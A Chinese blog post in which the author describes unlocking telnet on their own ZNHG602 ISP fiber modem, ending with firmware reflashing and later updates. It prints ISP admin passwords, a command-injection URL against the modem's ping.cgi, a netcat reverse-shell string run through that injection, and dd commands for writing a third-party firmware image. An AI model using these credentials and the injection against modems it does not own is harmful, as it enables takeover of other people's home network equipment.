兆能ZNHG602破解telnet

下方为我的一些尝试,可以直接翻到下边看最终解决方案...当然学习也可以

前几天办了新宽带,电信又拿了个新品牌的光猫,看背面写的是兆能(好吧不认识T_T)

按照惯例打开192.168.1.1:8080 界面,结果自动跳到了新luci界面。用惯用手段获取密码:

(小提示:在80界面密码栏直接输入nE7jA%5m即可登录8080,无需修改用户名)

打开ftp连接光猫,显示Pure_Ftpd(挺先进),用useradmin登录,看到了熟悉的romfile,下载到电脑发现没有加密!正当我激动之时发现里面并没有telnet设置……通过一番寻找找到8080端口的网页在/usr/share/web下,找到了ftpandTelnet.cgi这个文件,但用浏览器访问不了,电信直接封死了……有关备份和更新的也同样被封死。。。那就只能通过其他方式了。

0.ftp:通过四处寻找脚本发现/var下有Speedtest脚本,可能是手机端测速功能的后端,ftp上传一个反弹shell脚本上去,但手机上点测速并没有效果,而且登录回去发现文件并未被修改。可能ftpd有权限设置

1.ttl:光猫后螺丝只上了两个螺丝,另外一侧是卡上去的(好省钱……),用一把尺子轻松拆开。正面有几块黑胶,拆开后底下有熟悉的四个触点,还贴心的标上了TX RX,明摆着让你用呢!但putty连上后失望了,需要登录。用e8c和useradmin/admin都显示error,方法不通。

2.网页漏洞:(1)起初以为telnet服务是启动的(nmap显示23端口是filtered),在luci页面中端口映射127.0.0.1:23至127.0.0.1:23打开23端口,telnet连接后是连接重置……压根telnetd就没起来!

(2)在8080页面有ping.cgi,输入127.0.0.1测试后链接变成了http://192.168.1.1:8080/ping.cgi?diagIntfT=nas0.46&diagAddrT=127.0.0.1&diagTestTypeT=1&ippingversionT=4&repiNum=1&submit=1,关键点:addr可修改!修改地址为diagAddrT=127.0.0.1|ls后并没有出现报错

显示内容正常!直接运行telnetd经过实验什么都没有发生……在窗口看不到错误原因,因此可以尝试寻找可以反弹shell的工具。通过which nc找到nc。尝试直接用nc -e /bin/sh反弹 果不其然没有-e选项。因此用http://192.168.1.1:8080/ping.cgi?diagIntfT=nas0.46&diagAddrT=&nc 192.168.1.2 8080|/bin/sh|nc 192.168.1.2 8081&diagTestTypeT=1&ippingversionT=4&repiNum=1&submit=1成功反弹出shell,但60s后会报错且无法连接,显然不是我们的目的。在nc中再次运行telnetd -l /bin/login 后成功,但telnet依旧无法连接,可能对23端口有封阻。因此修改命令为telnetd -l /bin/login -p 7900,终于能连通。login处useradmin和密码成功登录且为root权限!发现系统内有很多有用的命令,但许多都在openwrt子系统(/opt/upt/framework内,是luci用到的系统),因此使用下列代码修复path:

export PATH="/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/opt/upt/framework/saf/rootfs/bin:/opt/upt/f
ramework/saf/rootfs/sbin:/opt/upt/framework/saf/rootfs/usr/bin:/opt/upt/framework/saf/rootfs/usr/sbin"

至此破解telnet结束。

(提供一个不需要nc直接网页访问就能开启telnet的链接:链接)

仍需解决的问题:整个系统除了openwrt系统外均为只读和tmpfs结合,无法保持任何文件修改。

==============分割线===============

11.28更新新的破解方式:刷写子系统固件

1.通过前文提供的链接打开telnet

2.下载本人修改好的固件(仅更新busybox和启动脚本,绝无任何挖矿/病毒脚本,若不相信可自行编译。。。)

下载链接(MD5:dcdc95b09ff0bed6cad2aa7adbe22d45请务必进行检查!)

3.利用ftp上传文件(需先在应用与功能中打开FTP)

# 当然 如果有es文件浏览器 winscp什么的也是可以的
# 推荐安装winscp
ftp 192.168.1.1 #登录账号为useradmin 密码在光猫背后
put mtd6new.img /mnt #在ftp连接后输入

4.连接telnet(192.168.1.1 端口号23 可以用putty termius windows自带telnet什么的连接),输入以下命令

# 登入后输入
md5sum /mnt/mtd6new.img # 如果md5不一致请重新上传
dd if=/mnt/mtd6new.img of=/dev/mtdblock6
# dd if=/mnt/mtd6new.img of=/dev/mtdblock7 非必要 如果上头刷完了重启没用在用 留一个原来系统备份
saf setactive 6 1

刷写时间较长,等运行完成后一定运行sync(会卡一会 无输出) 和 saf info (确保每个[]内不为空)查看刷写是否正常!

5.刷写完成后记得reboot 耐心等待5分钟后连接会出现熟悉的界面:(telnet 192.168.1.1 端口号7900)

修正: 登录账号root 默认密码为空

请务必使用busybox passwd 修改root密码!否则onu暴露在外网被当肉鸡概不负责!

(想不到吧,电信光猫里嵌了个openwrt!)mount发现根目录的确有overlay,剩余45M左右空间可以自由折腾!像做个服务器挂离线下载什么的都可以。cpu属于mips架构,大部分发行版都提供编译器,想要新功能可以自行添加,这里不再赘述。

另,建议插U盘使用,接入后自动挂载在/mnt/xxx 光猫存储寿命有限

注:系统内我自己编译了最新的全功能busybox 如果遇到命令不存在不妨使用busybox+命令试试?命令列表链接 可以用busybox --install -s /bin 注册软连接

opkg电信修改了不可用 需要自己tar xzvf解压ipk手动安装

子系统内dns有问题 我还没有找到解决办法 待补充...

 

2023年:

在光猫主系统(用链接打开的那个telnet)中找到了zysh软件,输入zysh[回车]进入后输入configu<tab> <tab>即可进入配置模式 输入?可以看到很多有趣的功能,在feature<tab>下还有更多配置!这个配置输入save后会真正保存,重启后不失效。输入local<tab> <tab> 1 可以永久打开主系统的telnet! 如果需要添加功能可以在主系统添加 但是每次重启都要手动再复制启动一次

 

2024年:

超级密码被改了,新的是 

wfaaAVQzjLZm

posted @ 2021-11-27 12:23  星如雨yu  阅读(5769)  评论(12编辑  收藏  举报